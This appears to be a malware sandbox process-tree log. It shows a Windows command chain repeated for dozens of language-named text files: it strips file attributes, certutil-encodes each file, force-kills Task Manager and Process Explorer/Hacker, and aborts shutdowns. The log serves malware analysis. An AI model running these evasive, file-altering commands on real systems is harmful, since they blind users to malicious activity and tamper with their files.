C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "it.txt" "it.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "it.txt" "it.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ja.txt" "ja.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ja.txt" "ja.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ka.txt" "ka.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ka.txt" "ka.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "kaa.txt" "kaa.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "kaa.txt" "kaa.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "kab.txt" "kab.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "kab.txt" "kab.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "kk.txt" "kk.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "kk.txt" "kk.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ko.txt" "ko.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ko.txt" "ko.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ku-ckb.txt" "ku-ckb.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ku-ckb.txt" "ku-ckb.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ku.txt" "ku.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ku.txt" "ku.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ky.txt" "ky.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ky.txt" "ky.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "lij.txt" "lij.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "lij.txt" "lij.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "lt.txt" "lt.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\certutil.execertutil -encode -f "lt.txt" "lt.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "lv.txt" "lv.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "lv.txt" "lv.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "mk.txt" "mk.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "mk.txt" "mk.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "mn.txt" "mn.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "mn.txt" "mn.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "mng.txt" "mng.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "mng.txt" "mng.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "mng2.txt" "mng2.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "mng2.txt" "mng2.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "mr.txt" "mr.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "mr.txt" "mr.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ms.txt" "ms.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ms.txt" "ms.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "nb.txt" "nb.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "nb.txt" "nb.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ne.txt" "ne.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ne.txt" "ne.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "nl.txt" "nl.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "nl.txt" "nl.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "nn.txt" "nn.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "nn.txt" "nn.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "pa-in.txt" "pa-in.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "pa-in.txt" "pa-in.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "pl.txt" "pl.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\certutil.execertutil -encode -f "pl.txt" "pl.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ps.txt" "ps.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ps.txt" "ps.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "pt-br.txt" "pt-br.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "pt-br.txt" "pt-br.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "pt.txt" "pt.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "pt.txt" "pt.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ro.txt" "ro.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ro.txt" "ro.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ru.txt" "ru.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ru.txt" "ru.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "sa.txt" "sa.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "sa.txt" "sa.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "si.txt" "si.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "si.txt" "si.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "sk.txt" "sk.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "sk.txt" "sk.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "sl.txt" "sl.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "sl.txt" "sl.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "sq.txt" "sq.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "sq.txt" "sq.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "sr-spc.txt" "sr-spc.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\certutil.execertutil -encode -f "sr-spc.txt" "sr-spc.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "sr-spl.txt" "sr-spl.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "sr-spl.txt" "sr-spl.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "sv.txt" "sv.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "sv.txt" "sv.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ta.txt" "ta.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ta.txt" "ta.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "th.txt" "th.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "th.txt" "th.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "tr.txt" "tr.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "tr.txt" "tr.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "tt.txt" "tt.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "tt.txt" "tt.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ug.txt" "ug.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ug.txt" "ug.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "uk.txt" "uk.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "uk.txt" "uk.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "uz.txt" "uz.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "uz.txt" "uz.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "va.txt" "va.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
-
-
C:\Windows\system32\certutil.execertutil -encode -f "va.txt" "va.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vi.txt" "vi.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vi.txt" "vi.txt".266435⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "yo.txt" "yo.txt".26643 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
-
